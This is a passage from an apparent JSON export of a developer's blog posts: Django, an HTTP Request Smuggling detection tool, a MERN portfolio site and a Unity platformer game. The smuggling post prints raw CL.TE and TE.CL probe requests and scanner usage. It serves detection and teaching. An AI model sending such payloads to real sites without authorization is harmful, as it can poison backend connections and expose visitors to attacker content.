class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token constant\">TEMPLATES</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span>\n    <span class=\"token punctuation\">{</span>\n        <span class=\"token string\">'BACKEND'</span><span class=\"token operator\">:</span> <span class=\"token string\">'django.template.backends.django.DjangoTemplates'</span><span class=\"token punctuation\">,</span>\n        <span class=\"token 
string\">'DIRS'</span><span class=\"token operator\">:</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n        <span class=\"token string\">'APP_DIRS'</span><span class=\"token operator\">:</span> <span class=\"token maybe-class-name\">True</span><span class=\"token punctuation\">,</span>\n        <span class=\"token string\">'OPTIONS'</span><span class=\"token operator\">:</span> <span class=\"token punctuation\">{</span>\n            <span class=\"token string\">'context_processors'</span><span class=\"token operator\">:</span> <span class=\"token punctuation\">[</span>\n                <span class=\"token string\">'django.template.context_processors.debug'</span><span class=\"token punctuation\">,</span>\n                <span class=\"token string\">'django.template.context_processors.request'</span><span class=\"token punctuation\">,</span>\n                <span class=\"token string\">'django.contrib.auth.context_processors.auth'</span><span class=\"token punctuation\">,</span>\n                <span class=\"token string\">'django.contrib.messages.context_processors.messages'</span><span class=\"token punctuation\">,</span>\n            <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">}</span><span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">}</span><span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">]</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><font size=\"4\">Please refer to Django official documentation of the Templates for further understanding.</font><br></div><div><ul><li><font size=\"4\"><a href=\"https://docs.djangoproject.com/en/3.2/topics/templates/\"><font color=\"#dd4124\">Django 
Templates</font></a><br></font></li></ul><div><br></div><div><font size=\"4\">Django is a very well-structured, high-level Python web framework that provides a complete suite for full-stack web development to build websites faster and make them more secure and scalable, which is why I chose this framework to rebuild the HackbotOne website.</font><br></div></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">HackbotOne Architecture</font></b><br></div><div><b style=\"\"><font size=\"5\"><br></font></b></div><div><font size=\"4\">The HackbotOne microservices are built using <a href=\"https://www.django-rest-framework.org/\"><font color=\"#dd4124\">django-rest-framework</font></a>, and three different services were developed to store and retrieve the data.</font></div><div><ol><li><font size=\"4\"><a href=\"https://api.hackbotone.com/api/v1/blogs/list?page=1\"><font color=\"#dd4124\">Blogs</font></a><br></font></li><li><font size=\"4\"><a href=\"https://api.hackbotone.com/api/v1/portfolio/me\"><font color=\"#dd4124\">Portfolio</font></a><br></font></li><li><font size=\"4\" color=\"#dd4124\"><a href=\"https://api.hackbotone.com/api/v1/youtube/latest\"><font color=\"#dd4124\">YouTube</font></a></font><br></li></ol><div><font size=\"4\">The Admin panel controls all three microservices and stores data in the <a href=\"https://www.postgresql.org/\"><font color=\"#dd4124\">PostgreSQL</font></a> database. 
To retrieve the records for all three microservices, <a href=\"https://api.hackbotone.com/api/v1/blogs/list?page=1\"><font color=\"#dd4124\">api.hackbotone.com</font></a> connects to the database and returns results for each endpoint. All of these endpoints are publicly accessible over the internet.</font><br></div></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">Open Source</font></b><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">I have made the complete development open source on my GitHub, and if you're interested in Django development, I believe the hackbotone project work will definitely be helpful for your project. I highly encourage you to clone both of the repositories below, and if you find any issues or have any ideas, feel free to raise an issue.</font></div><div><ul><li><font size=\"4\"><a href=\"https://github.com/anshumanpattnaik/hackbotone-api\"><font color=\"#dd4124\">hackbotone-api</font></a><br></font></li><li><font size=\"4\"><a href=\"https://github.com/anshumanpattnaik/hackbotone-website\"><font color=\"#dd4124\">hackbotone-website</font></a></font><br></li></ul><div><br></div></div><div><font size=\"4\">I hope you found this article helpful. Please share it on&nbsp;</font><span style=\"font-size: large;\">your social media or&nbsp;</span><span style=\"font-size: large;\">developer communities, so others can benefit from reading this post.</span></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "HTTP Request Smuggling Detection Tool",
            "blog_id": "http-request-smuggling-detection-tool",
            "author": "Anshuman Pattnaik",
            "published_date": "2020-12-20T19:58:00.593382Z",
            "last_updated_date": "2021-09-03T23:37:21.153548Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/http-request-smuggling-detection-tool/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/http-request-smuggling-detection-tool/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/http-request-smuggling-detection-tool/large_thumbnail.png",
            "keywords": [
                "Smuggling",
                "Python",
                "http-desync-attack"
            ],
            "highlights": "HTTP Request Smuggling is very critical and high severity vulnerability and was initially discovered by watchfire back in 2005 and later it got re-discovered by James Kettle - (albinowax) in August 2019 and presented his research at DEF CON 27 &amp; Black-HAT USA. HRS vulnerability allows an attacker to smuggle an ambiguous HTTP-request as second request in one single HTTP-request to bypass the security controls of a website and gain access to unauthorized sensitive data and performs malicious activities. To know more about this vulnerability I'll highly suggest referring James Kettle well-documented research blogs at Portswigger website.",
            "description": "<div><b><font size=\"5\">What is HTTP Request Smuggling?</font></b></div><div><br></div><div><font size=\"4\">HTTP Request Smuggling is very critical and high severity vulnerability and was initially discovered by <a href=\"https://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf\"><font color=\"#dd4124\">watchfire</font></a> back in 2005 and later it got re-discovered by <a href=\"https://twitter.com/albinowax\"><font color=\"#dd4124\">James Kettle - (albinowax)</font></a> in August 2019 and presented his research at <a href=\"https://www.youtube.com/watch?v=w-eJM2Pc0KI\"><font color=\"#dd4124\">DEF CON 27</font></a> &amp; <a href=\"https://www.youtube.com/watch?v=_A04msdplXs\"><font color=\"#dd4124\">Black-HAT USA</font></a>. HRS vulnerability allows an attacker to smuggle an ambiguous HTTP-request as second request in one single HTTP-request to bypass the security controls of a website and gain access to unauthorized sensitive data and performs malicious activities. 
To know more about this vulnerability, I highly suggest referring to James Kettle's well-documented research blogs on the PortSwigger website.</font></div><div><font size=\"4\"><br></font></div><div><div style=\"font-size: large;\"><ul><li><a href=\"https://portswigger.net/web-security/request-smuggling\"><font color=\"#dd4124\">https://portswigger.net/web-security/request-smuggling</font></a></li><li><a href=\"https://portswigger.net/web-security/request-smuggling/finding\"><font color=\"#dd4124\">https://portswigger.net/web-security/request-smuggling/finding</font></a></li><li><font color=\"#dd4124\"><a href=\"https://portswigger.net/web-security/request-smuggling/exploiting\" style=\"\"><font color=\"#dd4124\" style=\"\">https://portswigger.net/web-security/request-smuggling/exploiting</font></a></font></li></ul><div><br></div></div><div style=\"font-size: large;\"><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/ANIRMVwyz5o\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div style=\"font-size: large;\"><br></div><div style=\"\"><div style=\"\"><b style=\"\"><font size=\"5\">How to detect HRS vulnerability?</font></b></div><div style=\"font-size: large;\"><br></div><div style=\"\"><font size=\"4\">Based on the earlier research, the most common way to detect the HRS vulnerability is to check the application's response time: if the vulnerability exists, there will be a time delay in the response. 
There are two different ways to detect this vulnerability.</font></div><div style=\"font-size: large;\"><ul><li>CL.TE</li><li>TE.CL</li></ul></div><div style=\"font-size: large;\"><br></div><div style=\"\"><b style=\"\"><font size=\"5\">Detect (CL.TE) using time delay</font></b></div><div style=\"font-size: large;\"><br></div><div style=\"\"><font size=\"4\">To detect the (CL.TE) vulnerability in an application, you need to smuggle a request like the one below, which causes a delay in the response.</font></div><div style=\"\"><br></div></div></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token constant\">POST</span> <span class=\"token operator\">/</span> <span class=\"token constant\">HTTP</span><span class=\"token operator\">/</span><span class=\"token number\">1.1</span>\n<span class=\"token maybe-class-name\">Host</span><span class=\"token operator\">:</span> vulnerable<span class=\"token operator\">-</span>website<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span>\n<span class=\"token maybe-class-name\">Content</span><span class=\"token operator\">-</span><span class=\"token maybe-class-name\">Length</span><span class=\"token operator\">:</span> <span class=\"token number\">5</span>\n<span class=\"token maybe-class-name\">Transfer</span><span class=\"token operator\">-</span><span class=\"token maybe-class-name\">Encoding</span><span class=\"token operator\">:</span>chunked\n\n<span class=\"token number\">1</span>\n<span class=\"token constant\">Z</span>\n<span class=\"token constant\">Q</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><font size=\"4\">In the above HTTP request, the front-end server uses the Content-Length header, which has a length of 5, so it will only process the request body up to Z and won't include Q in the first request. 
The back-end server uses the Transfer-Encoding header, so it processes the first chunk of the request and waits for the next chunk to arrive. This causes a delay in the response, because the front-end server, following its Content-Length, processed only a request body of length 5.</font></div><div><br></div><div><b><font size=\"5\">Detect (TE.CL) using time delay</font></b></div><div><br></div><div><font size=\"4\">To detect the (TE.CL) vulnerability in an application, you need to smuggle a request like the one below, which causes a delay in the response.</font></div></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token constant\">POST</span> <span class=\"token operator\">/</span> <span class=\"token constant\">HTTP</span><span class=\"token operator\">/</span><span class=\"token number\">1.1</span>\n<span class=\"token maybe-class-name\">Host</span><span class=\"token operator\">:</span> vulnerable<span class=\"token operator\">-</span>website<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span>\n<span class=\"token maybe-class-name\">Content</span><span class=\"token operator\">-</span><span class=\"token maybe-class-name\">Length</span><span class=\"token operator\">:</span> <span class=\"token number\">6</span>\n<span class=\"token maybe-class-name\">Transfer</span><span class=\"token operator\">-</span><span class=\"token maybe-class-name\">Encoding</span><span class=\"token operator\">:</span>chunked\n\n<span class=\"token number\">0</span>\n\n<span class=\"token constant\">G</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><font size=\"4\">In the above HTTP request, the front-end server uses the Transfer-Encoding header, and the request body sends 0 followed by a blank line, which means the front-end server terminates the first request at 0, forwards it and leaves the remaining contents of the request body behind. 
The back-end server uses the Content-Length header, which has a length of 6, so it waits for more content to arrive, which causes a delay in the response.</font></div><div><br></div><div><b><font size=\"5\">HRS Detection Tool</font></b></div><div><br></div><div><font size=\"4\">Following the PortSwigger research academy, I have developed a detection tool in Python that identifies whether an application is vulnerable to (CL.TE) or (TE.CL). To detect the vulnerability more accurately, the tool has built-in payloads with around <a href=\"https://github.com/anshumanpattnaik/http-request-smuggling/blob/main/payloads.json\"><font color=\"#dd4124\">37 permutes</font></a> and detection payloads for both the (CL.TE) and (TE.CL) variants, and it supports scanning one single URL or multiple URLs. Most importantly, it has a (--retry) option, which means you can retry the same payload based on the retry value, giving us a way to detect this vulnerability more accurately.</font></div><div><br></div><div><b><font size=\"5\">Security consent to follow before using this tool</font></b></div><div><br></div><div><font size=\"4\">It's quite important to know the legal disclaimers before scanning any target. You should have proper authorization before scanning any target; otherwise, I suggest you do not use this tool to scan an unauthorized target, because to detect the vulnerability it sends multiple payloads multiple times when the (--retry) option is used. If something goes wrong, there is a possibility that the back-end socket might get poisoned with the payloads, and any genuine visitors of that particular website might end up seeing the poisoned payload rather than the actual content of the website. 
So I highly suggest taking proper precautions before scanning any target website; otherwise you will face legal issues.</font></div><div><br></div><div><b><font size=\"5\">How to use this tool?</font></b></div><div><br></div><div><font size=\"4\">To install this tool on your local machine, you must have at least Python version 3.x; otherwise the socket will fail to establish an SSL connection with the target host.</font></div><div><br></div><div><b><font size=\"5\">Installation</font></b></div></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">git clone https<span class=\"token operator\">:</span><span class=\"token operator\">/</span><span class=\"token operator\">/</span>github<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span><span class=\"token operator\">/</span>anshumanpattnaik<span class=\"token operator\">/</span>http<span class=\"token operator\">-</span>request<span class=\"token operator\">-</span>smuggling<span class=\"token punctuation\">.</span><span class=\"token property-access\">git</span>\ncd http<span class=\"token operator\">-</span>request<span class=\"token operator\">-</span>smuggling\npip3 install <span class=\"token operator\">-</span>r requirements<span class=\"token punctuation\">.</span><span class=\"token property-access\">txt</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b><font size=\"5\">Options</font></b><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">usage<span class=\"token operator\">:</span> smuggle<span class=\"token punctuation\">.</span><span class=\"token property-access\">py</span> <span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>h<span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span><span 
class=\"token operator\">-</span>u <span class=\"token constant\">URL</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>urls <span class=\"token constant\">URLS</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>t <span class=\"token constant\">TIMEOUT</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>m <span class=\"token constant\">METHOD</span><span class=\"token punctuation\">]</span>\n<span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>r <span class=\"token constant\">RETRY</span><span class=\"token punctuation\">]</span>\n\n<span class=\"token constant\">HTTP</span> <span class=\"token maybe-class-name\">Request</span> <span class=\"token maybe-class-name\">Smuggling</span> vulnerability detection tool\n\noptional arguments<span class=\"token operator\">:</span>\n<span class=\"token operator\">-</span>h<span class=\"token punctuation\">,</span> <span class=\"token operator\">--</span>help show <span class=\"token keyword\">this</span> help message and exit\n<span class=\"token operator\">-</span>u <span class=\"token constant\">URL</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">--</span>url <span class=\"token constant\">URL</span> <span class=\"token keyword\">set</span> the target url\n<span class=\"token operator\">-</span>urls <span class=\"token constant\">URLS</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">--</span>urls <span class=\"token constant\">URLS</span> <span class=\"token keyword\">set</span> list <span class=\"token keyword\">of</span> target urls<span class=\"token punctuation\">,</span> i<span class=\"token punctuation\">.</span><span class=\"token method function property-access\">e</span> <span class=\"token 
punctuation\">(</span>urls<span class=\"token punctuation\">.</span><span class=\"token property-access\">txt</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">-</span>t <span class=\"token constant\">TIMEOUT</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">--</span>timeout <span class=\"token constant\">TIMEOUT</span> <span class=\"token keyword\">set</span> socket timeout<span class=\"token punctuation\">,</span> <span class=\"token keyword module\">default</span> <span class=\"token operator\">-</span> <span class=\"token number\">10</span>\n<span class=\"token operator\">-</span>m <span class=\"token constant\">METHOD</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">--</span>method <span class=\"token constant\">METHOD</span> <span class=\"token keyword\">set</span> <span class=\"token constant\">HTTP</span> <span class=\"token maybe-class-name\">Methods</span><span class=\"token punctuation\">,</span> i<span class=\"token punctuation\">.</span><span class=\"token method function property-access\">e</span> <span class=\"token punctuation\">(</span><span class=\"token constant\">GET</span> or <span class=\"token constant\">POST</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token keyword module\">default</span> <span class=\"token operator\">-</span> <span class=\"token constant\">POST</span>\n<span class=\"token operator\">-</span>r <span class=\"token constant\">RETRY</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">--</span>retry <span class=\"token constant\">RETRY</span> <span class=\"token keyword\">set</span> the retry count to re<span class=\"token operator\">-</span>execute the payload<span class=\"token punctuation\">,</span> <span class=\"token keyword module\">default</span> <span class=\"token operator\">-</span> <span class=\"token number\">2</span></code></pre><div 
class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><b><font size=\"5\">Example usage of this tool</font></b></div><div><br></div><div><b><font size=\"4\">Scan a single&nbsp;</font></b><font size=\"4\"><b>URL</b></font></div></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">python3 smuggle<span class=\"token punctuation\">.</span><span class=\"token property-access\">py</span> <span class=\"token operator\">-</span>u <span class=\"token punctuation\">[</span><span class=\"token constant\">URL</span><span class=\"token punctuation\">]</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><b><font size=\"4\">Scan a list of&nbsp;</font></b><font size=\"4\"><b>URLs</b></font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">python3 smuggle<span class=\"token punctuation\">.</span><span class=\"token property-access\">py</span> <span class=\"token operator\">-</span>urls <span class=\"token punctuation\">[</span><span class=\"token maybe-class-name\">URLs</span><span class=\"token punctuation\">.</span><span class=\"token property-access\">txt</span><span class=\"token punctuation\">]</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><font size=\"4\">The detection payloads for both (CL.TE) and (TE.CL) are quite general, and if you feel they need modifying, you can update the payloads in the detection array of the <a href=\"https://github.com/anshumanpattnaik/http-request-smuggling/blob/main/payloads.json#L300\"><font color=\"#dd4124\">payloads.json</font></a> file.&nbsp;</font><span style=\"font-size: large;\">Time-based HRS detection logic is not always accurate, so to confirm the 
vulnerability I suggest you experiment with <a href=\"https://portswigger.net/bappstore/9abaa233088242e8be252cd4ff534988\"><font color=\"#dd4124\">Burp Suite Turbo Intruder</font></a> using your payloads.</span></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">I hope you find my HRS Detection tool useful. If you have any suggestions or find any issues, feel free to raise an issue in my <a href=\"https://github.com/anshumanpattnaik/http-request-smuggling/\"><font color=\"#dd4124\">GitHub&nbsp;repository</font></a>.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Thank you for reading this post and Happy Hacking :)</font></div></div>",
            "visibility": true,
            "is_featured": true,
            "featured_board": true,
            "featured": "<div><font face=\"Lora, serif\" size=\"4\">The project work is highly appreciated by many <a href=\"https://en.wikipedia.org/wiki/Information_security\"><font color=\"#dd4124\">InfoSec</font></a> communities and featured in their platforms by highlighting the tool implementation to detect CL.TE/TE.CL vulnerability.</font></div><div><font face=\"Lora, serif\" size=\"4\"><br></font></div><div><font face=\"Lora, serif\" size=\"4\"><b style=\"\">Top Mentions</b></font></div><div><ul><li><a href=\"https://www.youtube.com/watch?v=Zi4yjGeHUZE\"><font size=\"4\" color=\"#dd4124\">Pentester Academy TV | HTTP Request Smuggling Detection Tool</font></a><br></li><li><a href=\"https://www.kitploit.com/2021/08/http-request-smuggling-http-request.html\"><font size=\"4\" color=\"#dd4124\">KitPloit - PenTest &amp; Hacking Tools | HTTP Request Smuggling Detection Tool</font></a><br></li><li><a href=\"https://securityonline.info/http-request-smuggling-detection/\"><font color=\"#dd4124\" size=\"4\"><u>SecurityOnline | Penetration Testing Information Security</u></font><font size=\"4\" color=\"#dd4124\">&nbsp;| HTTP Request Smuggling Detection Tool</font></a></li><li><a href=\"https://www.errorsfind.com/http-request-smuggling-detection-tool/17/08/\"><font color=\"#dd4124\" size=\"4\"><u>Errorsfind - Latest Tools, Hacks &amp; Tutorials</u></font><font size=\"4\" color=\"#dd4124\">&nbsp;| HTTP Request Smuggling Detection Tool</font></a></li><li><a href=\"https://reposhub.com/python/working-with-http/anshumanpattnaik-http-request-smuggling.html\"><font color=\"#dd4124\" size=\"4\"><u>ReposHub</u></font><font size=\"4\" color=\"#dd4124\">&nbsp;| HTTP Request Smuggling Detection Tool</font></a></li><li><a href=\"https://blueteam.news/http-request-smuggling-http-request-smuggling-detection-tool/\"><font color=\"#dd4124\" size=\"4\"><u>Blue Team News&nbsp;</u></font><font size=\"4\" color=\"#dd4124\">| HTTP Request Smuggling Detection Tool</font></a></li><li><a 
href=\"https://kalilinuxtutorials.com/http-request-smuggling/\"><font color=\"#dd4124\" size=\"4\"><u>Kali Linux Tutorials</u></font><font color=\"#dd4124\" size=\"4\"><u>&nbsp;</u></font><font size=\"4\" color=\"#dd4124\">|&nbsp;</font><font color=\"#dd4124\" size=\"4\"><u>Http-Request-Smuggling : HTTP Request Smuggling Detection Tool</u></font></a></li><li><a href=\"https://www.hahwul.com/cullinan/http-request-smuggling/\"><font color=\"#dd4124\" size=\"4\"><u>HAHWUL</u></font><font color=\"#dd4124\" size=\"4\"><u>&nbsp;</u></font><font size=\"4\" color=\"#dd4124\">|&nbsp;</font><font color=\"#dd4124\" size=\"4\"><u>HTTP Request Smuggling</u></font></a></li><li><font color=\"#dd4124\" size=\"4\"><u><a href=\"https://ipfs.fleek.co/ipfs/QmXGeJ9pN5XuSXD9xtqqcy56ZJRXsRyuQFU1ZhMBLA4zsf/hacktricks/pentesting-web/http-request-smuggling/\"><font color=\"#dd4124\">Sapsan Pentesting Notes |&nbsp;HTTP REQUEST SMUGGLING / HTTP DESYNC ATTACK</font></a></u></font><br></li><li><font color=\"#dd4124\" size=\"4\"><u><a href=\"https://kandi.openweaver.com/python/anshumanpattnaik/http-request-smuggling\"><font color=\"#dd4124\">Kandi |&nbsp;HTTP Request Smuggling Detection Tool</font></a></u></font><br></li><li><font color=\"#dd4124\" size=\"4\"><a href=\"https://www.wangan.com/p/7fygf7b0f192fc96\"><font color=\"#dd4124\">Netan | Magic weapon-HTTP request smuggling detection tool</font></a><br></font></li><li><font color=\"#dd4124\" size=\"4\"><a href=\"https://eshielder.com/2021/08/13/request-smuggling-http-request-smuggling-detection-tool/\"><font color=\"#dd4124\"><u>e-Shielder Security News</u>&nbsp;|&nbsp;<u>Request-Smuggling – HTTP Request Smuggling Detection Tool</u></font></a></font></li><li><font face=\"Lora, serif\" size=\"4\"><a href=\"https://twitter.com/nil0x42/status/1340951508297379843\"><font color=\"#dd4124\">Automatically detect HTTP Request Smuggling vulnerabilities on target</font></a> - by <a href=\"https://twitter.com/nil0x42/\"><font 
color=\"#dd4124\">@nil0x42</font></a></font></li><li><font size=\"4\"><a href=\"https://twitter.com/ptracesecurity/status/1363028873068355586\"><font color=\"#dd4124\">HTTP Request Smuggling Detection Tool</font></a> - by <a href=\"https://twitter.com/ptracesecurity/\"><font color=\"#dd4124\">@ptracesecurity</font></a></font></li><li><font size=\"4\" color=\"#dd4124\"><a href=\"https://pythonrepo.com/repo/anshumanpattnaik-http-request-smuggling\"><font color=\"#dd4124\">PythonRepo | HTTP Request Smuggling Detection Tool</font></a></font></li><li><font size=\"4\" color=\"#dd4124\"><a href=\"https://book.hacktricks.xyz/pentesting-web/http-request-smuggling#tools\"><font color=\"#dd4124\">HackTricks | HTTP Request Smuggling / HTTP Desync Attack</font></a></font></li></ul></div><div><br></div>"
        },
        {
            "title": "My Portfolio | Full Stack MERN Application",
            "blog_id": "my-portfolio-full-stack-mern-application",
            "author": "Anshuman Pattnaik",
            "published_date": "2020-06-24T19:57:51.110159Z",
            "last_updated_date": "2021-06-06T10:36:04.886733Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/my-portfolio-full-stack-mern-application/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/my-portfolio-full-stack-mern-application/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/my-portfolio-full-stack-mern-application/large_thumbnail.png",
            "keywords": [
                "Portfolio",
                "node.js",
                "mongodb"
            ],
            "highlights": "A portfolio site is essential for every software developer to showcase projects and technical skills which demonstrates what you can do based upon your resume, your portfolio will be very much helpful on the job search because the employer can able to see your work and will be easier for them to evaluate your work for the suitable job, nowadays for every software developer is quite essential to maintain a web presence like official GitHub, Twitter account & your website, so that you can reach out developer communities and build a developer network.",
            "description": "<b><font size=\"5\">Why a portfolio site is essential for a Software developer?</font></b><div><b><font size=\"5\"><br></font></b></div><div><font size=\"4\">A portfolio site is essential for every software developer to showcase projects and technical skills which demonstrates what you can do based upon your resume, your portfolio will be very much helpful on the job search because the employer can able to see your work and will be easier for them to evaluate your work for the suitable job, nowadays for every software developer is quite essential to maintain a web presence like official GitHub, Twitter account &amp; your website, so that you can reach out developer communities and build a developer network.</font><br></div><div><font size=\"4\"><br></font></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/nodp9iETm4A\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><div><b><font size=\"5\">Tips to highlight areas on your portfolio</font></b></div><div><br></div><div><font size=\"4\">While building your portfolio website a few things you need to focus on</font></div><div><br></div><div><ul><li><font size=\"4\">Single page application (Don't use templates)</font></li><li><font size=\"4\">Short introduction</font></li><li><font size=\"4\">Top Skills</font></li><li><font size=\"4\">Best projects - (Try not to highlight every single project)</font></li><li><font size=\"4\">Popular blogs - (Top 10/5/3)</font></li><li><font size=\"4\">Contacts</font></li></ul></div><div><br></div><div><font size=\"4\">And always it's quite important to know that don't use templates while building your website because the templates are pre-built all you need to do is change the content of the template and the website will be completed and as a software developer, you shouldn't be using templates as it won't highlight your technical expertise to make a website 
and also some other may use the same template, so always built your website from scratch to make it unique so that it will reflect your creative skills to the outside world and your work will be appreciated by the developer communities.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">After building your website when you are planning to mention your projects always remember one thing don't mention every single project on your website which are the projects either in production or in GitHub with a well-maintained version controls that you can mention in your portfolio and always make the website as a single page web application so that it will be easier for the employer to know about yourself quickly.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">The same approach I have also followed while building my portfolio site, I have tried to short my introduction, top skills, best projects &amp; my popular blogs, so that it will be easier for everyone to know about myself in a short time.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">My portfolio - <a href=\"https://myportfolio.hackbotone.com/\"><font color=\"#dd4124\"><b>https://myportfolio.hackbotone.com</b></font></a></font></div><div><br></div><div><font size=\"5\"><b>How I built my portfolio site from scratch?</b></font></div><div><br></div><div><font size=\"4\">I have built my site using react.js as a front end, node.js as a back-end, and MongoDB as storage, for better performance I have implemented server-side rendering technique which is a very popular technique for rendering client-side webpage on the server and server will send the complete result to the client, and to bundle the module I have used Webpack which is a module bundler to bundle JavaScript, front-end assets.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">I have made the complete development open-source on my GitHub&nbsp;so that it will be helpful 
for you while building your portfolio website.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\" color=\"#dd4124\"><b><a href=\"https://github.com/anshumanpattnaik/reactjs-portfolio-mern-website\"><font color=\"#dd4124\">https://github.com/anshumanpattnaik/reactjs-portfolio-mern-website</font></a></b></font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">So this is the overall explanation of this website, I hope you guys understood as of now that why the portfolio side is essential for the software developer if you find any types of issue in my code then please feel free to raise an issue on GitHub.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Thank you &amp; Happy coding :)</font></div></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "Forest Assassin 2D Platformer Game",
            "blog_id": "forest-assassin-2d-platformer-game",
            "author": "Anshuman Pattnaik",
            "published_date": "2020-04-30T19:57:14.550509Z",
            "last_updated_date": "2021-06-03T20:03:42.824280Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/forest-assassin-2d-platformer-game/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/forest-assassin-2d-platformer-game/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/forest-assassin-2d-platformer-game/large_thumbnail.png",
            "keywords": [
                "Game Development",
                "Unity3D",
                "HTML5"
            ],
            "highlights": "Forest Assassin is a 2D adventure platformer game with easy controls and fun gameplay, which helps every one to get started, this is a classic platformer game with wonderfully designed characters and world. To complete the game collect all the coins and the trophy try to collect all 100 gold coins to become the highest scorer in this adventurers platformer game, on your way you will face many obstacles and enemies and use your sword to fight with the enemy.",
            "description": "<b><font size=\"5\">Introduction</font></b><div><b><font size=\"5\"><br></font></b></div><div><b style=\"\"><font size=\"6\">F</font></b><font size=\"4\">orest Assassin is a 2D adventure platformer game with easy controls and fun gameplay, which helps every one to get started, this is a classic platformer game with wonderfully designed characters and world. To complete the game collect all the coins and the trophy try to collect all 100 gold coins to become the highest scorer in this adventurers platformer game, on your way you will face many obstacles and enemies and use your sword to fight with the enemy.</font><br></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">How to play the game on desktop browser?</font></b><br></div><div><b style=\"\"><font size=\"5\"><br></font></b></div><div><div><font size=\"4\">To make it easier for the user I have also published as a desktop browser game because people always love to play browser games and the reason is its quick easy no need for any types of installation.&nbsp;</font></div><div><span style=\"font-size: large;\"><br></span></div><div><span style=\"font-size: large;\">Currently, the game is available at </span><a href=\"https://games.hackbotone.com/forest-assassin/\" style=\"font-size: large;\"><font color=\"#dd4124\"><b>https://games.hackbotone.com/forest-assassin/</b></font></a><span style=\"font-size: large;\"> and it supports all the modern desktop browsers.</span></div></div><div><span style=\"font-size: large;\"><br></span></div><div><ul><li><font size=\"4\">To move use [ A ] [ D ] or arrow keys</font><br></li><li><font size=\"4\">Use [ SPACE ] key to jump<br></font></li><li><font size=\"4\">Use [ W ] key to attack<br></font></li><li><font size=\"4\">To finish the game collect all coins and the trophy<br></font></li></ul><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">How to play the game on Android 
